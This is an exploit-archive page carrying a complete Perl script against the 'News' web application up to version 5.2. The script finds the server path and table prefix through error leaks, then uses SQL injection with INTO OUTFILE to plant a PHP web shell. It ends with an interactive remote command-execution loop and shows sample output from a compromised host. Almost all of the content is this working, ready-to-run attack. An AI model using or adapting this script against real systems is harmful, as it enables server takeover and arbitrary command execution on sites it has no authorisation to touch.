exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

News52.txt

News52.txt
Posted Jul 2, 2006
Authored by DarkFig

News versions 5.2 and below remote SQL injection exploit that performs arbitrary command execution.

tags | exploit, remote, arbitrary, sql injection
SHA-256 | 7fa0ea9819fe5c86474b56680195b1d342dc218c728d8cd56f5654499f46ba9e

News52.txt

Change Mirror Download
#!/usr/bin/perl
#
# VulnScr: News version 5.2 and prior
# E-mail: contact@vincent-leclercq.com
# Web: www.vincent-leclercq.com
#
# Date: Thu June 29 12:01 2006
# Credits: DarkFig (gmdarkfig@gmail.com)
# Vuln: XSS, Full Path Disclosure, SQL Injection
# Advisorie: http://www.acid-root.new.fr/advisories/news52.txt (french =))
# Exploit: Create a php file (system($cmd)) in a dir ((smileys)chmoded 777 during the installation of the script)
#
#
# +-----------------------------------------+
# | News <= 5.2 SQL Injection (cmd exec) ---|
# +-----------------------------------------+
# [+]Full path: OK [/home/www/victim/news52]
# [+]Prefix: OK [news_]
# [+]File exist: OK
# [localhost]uname -a
# Linux ws6 2.6.16-SE-k8 #6 SMP PREEMPT Thu May 11 18:19:55 UTC 2006 i686 GNU/Linux
# [localhost]exit
# +-----------------------------------------+
#
use LWP::UserAgent;
use LWP::Simple;
use Getopt::Long;


#
# Argvs
#
header();
if(!$ARGV[1]){ &usageis; }
GetOptions( 'host=s' => \$host,
'path=s' => \$path,
);
if($host =~ /http:\/\/(.*)/){
$host = $1;
}


#
# Vars
#
my $helurl = 'http://'.$host.$path;
my $uagent = 'Perlnamigator';
my $timeut = '30';
my $errr00 = "[-]Can't connect to the host\n";
my $errr01 = "[-]Can't get the full path of the website\n";
my $errr02 = "[-]Can't get the table prefix\n";
my $errr03 = "[-]The php file doesn't exist\n";


#
# Client
#
my $client = LWP::UserAgent->new();
$client->agent($uagent);
$client->timeout($timeut);


#
# First step: Determine the installation path.
#
$req1 = $client->post($helurl.'index.php', Content => ['mail[]' => 'root\@localhost.com', 'submit' => 'S%27inscrire'],) or print $errr00 and the_end();
if($req1->as_string =~ /in <b>(.*?)\/configuration\/head.php<\/b>/) {
$fullpath = $1;
print "[+]Full path: OK [$fullpath]\n";
$fullpath .= "/admin/smileys/hello.php";
} else {
print $errr01;
the_end();
}


#
# Second step: Determine the table prefix.
#
$req2 = $client->get($helurl.'divers.php?action=XXX&id=%27ERROR');
if($req2->as_string =~ /SELECT id FROM (.*?) WHERE/) {
$prefixe = $1;
print "[+]Prefix: OK [$prefixe]\n";
} else {
print $errr02;
the_end();
}


#
# Third step: Create a php file (system($cmd))
#
$inject = "%27%20UNION%20SELECT%20%27%3C?%20system(\$cmd);%20?%3E%27%20FROM%20".$prefixe."%20INTO%20OUTFILE%20%27".$fullpath."%27%23";
$req3 = $client->get($helurl.'divers.php?action=XXX&id='.$inject) or print $errr00 and the_end();


#
# Fourth step: file_exists()? yes ! enjoy =)
#
$req4 = get($helurl.'admin/smileys/hello.php') or print $errr03 and the_end();
print "[+]File exist: OK\n";
&commandexec;


#
# Subroutines
#
sub commandexec {
while(1 ne 2) {
print "[$host]"; chomp($cmd = <STDIN>);
if($cmd eq "exit"){ &the_end; }
$req5 = get($helurl.'admin/smileys/hello.php?cmd='.$cmd) or print $errr00 and the_end();
print $req5, "\n";
}}

sub usageis {
print "| Usage: -host localhost -path /news/ ---| \n";
&the_end;
}

sub the_end {
print "+-----------------------------------------+\n";
exit;
}

sub header {
print "\n+-----------------------------------------+\n";
print "| News <= 5.2 SQL Injection (cmd exec) ---|\n";
print "+-----------------------------------------+\n";
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close